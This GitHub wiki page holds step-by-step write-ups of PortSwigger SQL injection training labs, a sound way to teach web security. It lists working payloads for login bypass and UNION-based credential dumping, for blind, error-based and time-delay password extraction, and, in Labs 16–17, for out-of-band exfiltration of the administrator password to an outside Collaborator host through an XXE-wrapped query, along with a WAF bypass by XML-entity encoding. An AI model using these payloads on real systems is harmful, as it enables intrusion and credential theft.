SQL Injection - NANDITHA90/PortSwigger-LABS GitHub Wiki

LAB - 1

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

  • To solve the lab, performing an SQL injection attack that causes the application to display one or more unreleased products.

(a) Clothing, shoes and accessories Page :

image

(b) Add to the URL :

  • +OR+1=1--

image


LAB - 2

SQL injection vulnerability allowing login bypass

  • To solve the lab, performing an SQL injection attack that logs in to the application as the administrator user.

(a) Log-IN :

  • UserName : administrator

image

(b) Logs in to the application as the administrator user.

image


LAB - 3

SQL injection attack, querying the database type and version on Oracle

  • Using a UNION attack to retrieve the results from an injected query.

  • To solve the lab, displaying the database version string.

(a) First we check the number of columns by injecting null values with dual for oracle database.

  • category=Tech Gifts'+union+select+null,null+from+dual--

image

(b) Then we give SELECT * FROM v$version to retreive the Oracle database info

  • category=Tech Gifts'+union+select+null,banner+from+v$version--

image

  • Trying for Another Category

image


LAB - 4

SQL injection attack, querying the database type and version on MySQL and Microsoft

  • Using a UNION attack to retrieve the results from an injected query.

  • To solve the lab, displaying the database version string.

(a) First we have to check the number of columns and string match :

  • category=Lifestyle+union+select+null,'a'--

image

(b) Then we give select @@version for MySQL and Microsoft version and %23 for # to comment out.

  • category=Lifestyle'+union+select+null,@@version%23

image


LAB - 5

SQL injection attack, listing the database contents on non-Oracle databases

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
    • The application has a login function, and the database contains a table that holds usernames and passwords.
    • We are now determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
    • To solve the lab, we are logging in as the administrator user.

(a) First we list the tables by using information_schema.tables query

  • category=Gifts'+union+select+table_name,+null+from+information_schema.tables--

image

(b) Now we select column names from the table users_ebdodv

  • category=Gifts'+union+select+column_name,+null+from+information_schema.columns+where+table_name='users_ebdodv'--

image

(c) Now we get the Credentials

image

image

(d) Now we enumerate all user credentials by above info

  • category=Pets'+union+select+username_ixiyhx,+password_eocpkk+from+users_ebdodv--
  • We got the administrator password and logged in to solve the lab.

image

(e) Now we are trying to Login as administrator with the password generated

image

  • Logged in successfully as an administrator :

image


LAB - 6

SQL injection attack, listing the database contents on Oracle

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.
    • The application has a login function, and the database contains a table that holds usernames and passwords.
    • We are determining the name of this table and the columns it contains, then retrieving the contents of the table to obtain the username and password of all users.
    • To solve the lab, logging in as the administrator user.

(a) First we list the tables

  • category=Pets'+union+select+table_name,null+from+all_tables--

image

(b) Then we check for users' table

  • category=Pets%27+union+select+column_name,null+from+all_tab_columns+where+table_name=%27USERS_PJXZUN%27--

  • Now we get the Credentials

image image

(c) Now we enumerate all user credentials by above info

  • category=Pets'+union+select+USERNAME_QEEVWD,+PASSWORD_EPOMRV+from+USERS_PJXZUN--
  • We got the user Credentials

image

(e) Now we are trying to Login as administrator with the password generated

image

  • Logged in successfully as an administrator :

image

  • Logging in as carlos with their Credentials provided
    • Successfully logged-in as carlos.

image

image


LAB - 7

SQL injection UNION attack, determining the number of columns returned by the query

  • About

    • This lab contains a SQL injection vulnerability in the product category filter.
    • Using a UNION attack to retrieve the results from an injected query.
    • To solve the lab, displaying the database version string.
  • The first step of such an attack is to determine the number of columns that are being returned by the query.

  • To solve the lab, We are determining the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

(a) Category - LIFESTYLE :

image

(b) Using one and two null values will gives us Internal Server Error due to non-matching of null values with number of columns.

  • category='Lifestyle'+union+select+null,null,.....<No of null occurences> --
  • category=Lifestyle+union+select+null--

image

(c) Using third null will match the number of columns :

  • category=Lifestyle'+union+select+null,null,null--

image


LAB - 8

SQL injection UNION attack, finding a column containing text

  • About
    • The results from the query is returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

    • To construct such an attack, we first need to determine the number of columns returned by the query.

    • The lab will provide a random value that we need to make appear within the query results.

    • To solve the lab, we are performing a SQL injection UNION attack that returns an additional row containing the value provided.

    • This technique helps us to determine which columns are compatible with string data.

    • Make the database retrieve the string: y4d3eF

(a) First we have to determine the number of columns of the category by using NULL values.

  • category=Pets+union+select+null,null,null--

image

(b) Then we have to check which column contains string by replacing null with a for each column

  • 1st : category=Pets'+union+select+'a',null,null--
    • Internal Server Error

image

  • 2nd : category=Pets'+union+select+null,'a',null--
    • String

image

  • 3rd : category=Pets'+union+select+null,null,'a'--
    • Internal Server Error

image

  • From the above 3, we can observe that we got the 2nd column as string. So, we replace a with the desired string : y4d3eF

image


LAB - 9

SQL injection UNION attack, retrieving data from other tables

  • About
    • The results from the query are returned in the application's response, so are using a UNION attack to retrieve data from other tables.

    • The database contains a different table called users, with columns called username and password.

    • To solve the lab, we are performing a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

(a) First we determine 2 number of columns by running null values and a for confirming that it contains 2 string values.

  • category=Pets'+union+select+'a','a'--

image

(b) Then we give the username and password from users table

  • category=Pets'+union+select+username,password+from+users--

image

(c) Retrieving the user credentials.

image

(d) Logging in with the Credentials

  • As Administrator

image image

  • As Wiener

image image

  • As Carlos

image image

Just a Check :

  • Trying with invalid Credentials.
    • Invalid User Credentials doesn't log in.

image


LAB - 10

SQL injection UNION attack, retrieving multiple values in a single column

  • About
    • The results from the query are returned in the application's response, so we are using a UNION attack to retrieve data from other tables.

    • The database contains a different table called users, with columns called username and password.

    • To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

image

(a) First we have to check the number of columns :

  • category=Pets'+union+select+null,null--

image

(b) Then we check for the string related column :

  • category=Pets'+union+select+null,null,'a'--

image

(c) Then we give username and password as concatenated string

  • category=Pets+union+select+null,username||'~'||password+from+users--
  • User credentials with ~ separator

image

(d) Logging in with the provided credentials

  • logged in

image image


LAB - 11

Blind SQL injection with conditional responses

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
    • The database contains a different table called users, with columns called username and password.
    • We need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, logging in as the administrator user.
  • Steps For Burp Suite

    • Open Burp Suite Community Edition

    • Go to PROXY Tab

    • Select : OPEN BROWSER

    • Now, Paste the Link of the Experiment Page in the Opened Website

    • Go Back to Burp Suite, Turn ON INTERCEPT

    • Go to Browser and Select : MY ACCOUNT

    • Go to Burp Suit, Keep forwarding the DATA available until you get COOKIE TRACKINGID

    • Once you get the ID, Right Click and Select : SEND TO REPEATER

  • PROXY TAB

image

  • REPEATER TAB

image

(a) Perform SQL injection in place of Cookie TrackingID and Search for Welcome Back Message

  • Type TrackingId=xyz' AND '1'='1 and Click on SEND

  • Welcome Back Message appears...

image

image

  • Type TrackingId=xyz' AND '1'='2 and Click on SEND

  • Welcome Back Message Disappears...

image

(b) Check whether there is a TABLE named USERS

  • Type TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a and Click on SEND

  • Welcome Back Message appears... USERS Table Exists

image

(c) Check whether there is a USER called ADMINISTRATOR

  • Type TrackingId=xyz'+union+select+'a'+from+users+where+username='administrator'-- and Click on SEND

  • Welcome Back Message appears... USER called ADMINISTRATOR Exists

image

(d) Determining how many characters are in the password of the administrator user

  • Type TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a and Click on SEND

  • TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>1--

    TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>2--

    TrackingId=x'+union+select+'a'+from+users+where+username='administrator'+and+length(password)>3--

    . . .

  • 19th Trial

    • Welcome back is still appearing

image

  • 20th Trial

    • The WELCOME BACK message Disappears

    • This condition should be true, confirming that the password is greater than 1 character in length.

image

(e) Send to INRTUDER

  • Add : §

image

(f) Check for Password length by running Numbers Payload

image

(g) Grep-Match : Add - Welcome Back

image

(h) Start ATTACK

image

(i) Guessing Administrator Password

  • Add the following

image

1st Character of the PASSWORD : z

image

  • Change the Code to SUBSTRING(password,2,1) for the 2nd Character

image

2nd Character of the PASSWORD : k

image

3rd Character of the PASSWORD : 0

image

4th Character of the PASSWORD : i

image

5th Character of the PASSWORD : 1

image

6th Character of the PASSWORD : d

image

7th Character of the PASSWORD : r

image

8th Character of the PASSWORD : q

image

9th Character of the PASSWORD : x

image

10th Character of the PASSWORD : o

image

11th Character of the PASSWORD : w

image

12th Character of the PASSWORD : n

image

13th Character of the PASSWORD : 3

image

14th Character of the PASSWORD : s

image

15th Character of the PASSWORD : t

image

16th Character of the PASSWORD : u

image

17th Character of the PASSWORD : a

image

18th Character of the PASSWORD : 8

image

19th Character of the PASSWORD : 3

image

20th Character of the PASSWORD : 2

image

  • PASSWORD FORMED : zk0i1drqxown3stua832

image

image


LAB - 12

Blind SQL injection with conditional errors

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows.
    • If the SQL query causes an error, then the application returns a custom error message.
    • The database contains a different table called users, with columns called username and password.
    • We are exploiting the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.
  • PROXY TAB

image

  • REPEATER TAB

image

(a) Appending a single quotation mark to the TrackingID

  • TrackingId=xyz'

Internal Server Error

image

(b) Appending a single quotation mark to the TrackingID

  • TrackingId=xyz''

HTTP/2 200 OK

image

(c) Appending '||(SELECT '')||' to the TrackingID

image

(d) Appending '||(SELECT '' FROM dual)||' to the TrackingID

image

As we no longer receive an error, this indicates that the target is probably using an Oracle database, which requires all SELECT statements to explicitly specify a table name.

(e) Try querying a non-existent table name:

This time, an error is returned. This behavior strongly suggests that your injection is being processed as a SQL query by the back-end.

image

(f) Try querying an existent table name:

As this query does not return an error, we can infer that this table does exist.

Note that the WHERE ROWNUM = 1 condition is important here to prevent the query from returning more than one row, which would break our concatenation.

image

(g) You can also exploit this behavior to test conditions.

Error Message is Received

image

(h) You can trigger an error conditionally on the truth of a specific condition.

Error Disappears

The CASE statement tests a condition and evaluates to one expression if the condition is true, and another expression if the condition is false. The former expression contains a divide-by-zero, which causes an error. In this case, the two payloads test the conditions 1=1 and 1=2, and an error is received when the condition is true.

image

(i) Testing whether specific entries exist in a table

  • TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
  • User : Administrator

Verifying that the condition is true (the error is received), confirming that there is a user called administrator.

image

(j) Characters in the Password of administrator user

  • TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

We get the Error --> So that means the password is greater than 1 character in length.

image

Giving : 19

image

Giving : 20

When the condition stops being true (i.e. when the error disappears), we have determined the length of the password, which is in fact 20 characters long.

image

(k) Length via Intruder

  • Payload Positions

image

  • Payload Cofigurations

image

  • Starting Attack

Here we can see it is 20 in length.

image

(l) Finding Password

  • TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

image

  • Payload Configuration

Add a-z and 0-9

image

  • Start Attack to find all the Characters

1st Character : l

image

2nd Character : 5

image

3rd Character : 9

image

4th Character : c

image

5th Character : 7

image

6th Character : y

image

7th Character : h

image

8th Character : 4

image

9th Character : w

image

10th Character : t

image

11th Character : o

image

12th Character : 5

image

13th Character : l

image

14th Character : 3

image

15th Character : 7

image

16th Character : s

image

17th Character : v

image

18th Character : x

image

19th Character : 0

image

20th Character : 6

image

  • PASSWORD FORMED : l59c7yh4wto5l37svx06

image

image


LAB - 13

Visible error-based SQL injection

  • About

    • The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned.
    • The database contains a different table called users, with columns called username and password.
    • To solve the lab, we are finding a way to leak the password for the administrator user, then log in to their account.

(a) TrackingID

  • Proxy > HTTP history tab and find a GET / request that contains a TrackingId cookie.

image

(b) Adapt the query to include a generic SELECT subquery and cast the returned value to an int data type :

Send the request.

Observe that we now get a different error saying that an AND condition must be a Boolean expression.

image

(c) Modify the condition accordingly

Send the request. Confirm that you no longer receive an error. This suggests that this is a valid query again.

image

(d) Adapt your generic SELECT statement so that it retrieves usernames from the database :

Observe that you receive the initial error message again.

Notice that your query now appears to be truncated due to a character limit. As a result, the comment characters you added to fix up the query aren't included.

image

(e) Delete the original value of the TrackingId cookie to free up some additional characters. Resend the request.

Notice that you receive a new error message, which appears to be generated by the database.

This suggests that the query was run properly, but you're still getting an error because it unexpectedly returned more than one row.

image

(f) Modify the query to return only one row:

  • TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

ERROR: invalid input syntax for type integer: "administrator"

image

(g) Now that you know that the administrator is the first user in the table, modify the query once again to leak their password:

TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

image

  • Password Generated : ntvpfj49vdtgstvx6x3f

(h) Logging In

image

image


LAB - 14

Blind SQL injection with time delays

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
    • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
    • To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.

(a) Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.

  • At Proxy

image

  • After sending to the Intruder

image

(b) Modify the TrackingId cookie, changing it to:

  • TrackingId=x'||pg_sleep(10)--

Send it from Intruder to the Repeater

Now Send it to the Response

It'll take 10 Seconds to APPEAR or DISPLAY (DELAY)

image

SOLVED

image


LAB - 15

Blind SQL injection with time delays and information retrieval

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error.
    • However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
    • The database contains a different table called users, with columns called username and password.
    • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.

(a) TrackingID

image

(b) Modifying the request containing TrackingID

  • TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response after 10 Seconds (It had Time Delay)

image

(b) Modifying the request containing TrackingID

  • TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

We will observe that we got the Response immediately (It had NO Time Delay)

image

A single Boolean condition can change the Response.

(c) Conforming whether there's a User called Administrator

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

If it's True, it takes 10 Seconds to Respond.

image

(d) Determining the Characters in the Password

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
  • It takes 10 Seconds to Respond

If it's true, then the Response takes 10 Seconds to respond.

image

  • Keep Sending until the condition satisfies

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

. . .

During the 20th Trial, we get the Response Immediately.

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>20)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

image

  • So, that means the Length of the password is 20 Characters.

(e) Burp Intruder

image

  • Payload settings

image

  • Starting the Attack

We will observe that there will be 10 seconds delay for each outcome until 20th iteration, after the 20th iteration we will get immediate response.

image

(f) Change the TrackingID

  • TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

  • Characters are the ones which take 10 Seconds time to appear (other characters appear immediately)

1st Character : 4

image

2nd Character : b

image

3rd Character : i

image

4th Character : 4

image

5th Character : z

image

6th Character : m

image

7th Character : 9

image

8th Character : 2

image

9th Character : j

image

10th Character : e

image

11th Character : z

image

12th Character : y

image

13th Character : j

image

14th Character : z

image

15th Character : s

image

16th Character : s

image

17th Character : y

image

18th Character : e

image

19th Character : 3

image

20th Character : e

image

  • PASSWORD FORMED : 4bi4zm92jezyjzssye3e

(f) Logging In

image

SOLVED

image


LAB - 16

Blind SQL injection with out-of-band interaction

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The SQL query is executed asynchronously and has no effect on the application's response.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

(a) TrackingID

image

(b) Modifying TrackingID

  • TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

image

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

image

image

SOLVED

image


LAB - 17

Blind SQL injection with out-of-band data exfiltration

  • About

    • The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
    • The SQL query is executed asynchronously and has no effect on the application's response.
    • However, you can trigger out-of-band interactions with an external domain.
    • The database contains a different table called users, with columns called username and password.
    • You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
    • To solve the lab, log in as the administrator user.

(a) TrackingID

image

(b) Modify the TrackingID

  • Changing it to a payload that will leak the administrator's password in an interaction with the Collaborator server.

  • For example, you can combine SQL injection with basic XXE techniques.

  • TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

image

Right-click and select Insert Collaborator payload to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

image

image

  • Go to the Collaborator tab, and click Poll now.

image

  • If you don't see any interactions listed, wait a few seconds and try again, since the server-side query is executed asynchronously.

  • You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

image

  • The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Collaborator tab.

  • For DNS interactions, the full domain name that was looked up is shown in the Description tab.

image

  • For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab.

image

  • In the browser, click My account to open the login page.

  • Use the password to log in as the administrator user.

image

image

image

SOLVED


LAB - 18

SQL Injection with filter bypass via XML encoding

  • About

    • This lab contains a SQL injection vulnerability in its stock check feature.
    • The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
    • The database contains a users table, which contains the usernames and passwords of registered users.
    • To solve the lab, perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account.

(a) Open Burp Suite

  • Follow the Steps :

    • Open Burp Suite
    • Open Browser
    • Paste the link in the Default Brower opened
    • In the Default Browser opened, go to the Product (Select the View Details)
    • Turn ON : INTERCEPT
    • Click : CHECK STOCK

Observe that the stock check feature sends the productId and storeId to the application in XML format.

image

  • Send the POST /product/stock request to Burp Repeater.

    • Right Click > Sent to Repeater
    • Send

image

(b) Burp Repeater

  • Probe the storeId to see whether your input is evaluated.

  • For example, try replacing the ID with mathematical expressions that evaluate to other potential IDs

  • <storeId>1+1</storeId>

image

Observe that the input appears to be evaluated by the application, returning the stock for different stores.

(c) Determining the number of columns returned by the original query

  • By appending a UNION SELECT statement to the original store ID

    • <storeId>1 UNION SELECT NULL</storeId>

image

Observe that your request has been blocked due to being flagged as a potential attack.

(d) Obfuscating payload using XML entities

  • Highlight your Input > Right-click > Extensions > Hackvertor > Encode > dec_entities/hex_entities.

image

  • <storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

image

(e) Logging In to their Accounts

username ~ password

  • Credentials :

    • carlos ~ vg5ziyj5vgq59mpjtq2j

    • administrator ~ rdxwmpheiisakm0evnkd

    • wiener ~ y4gbezbjt0fngtgxt3mi

  • Administrator

image

image

⚠️ **GitHub.com Fallback** ⚠️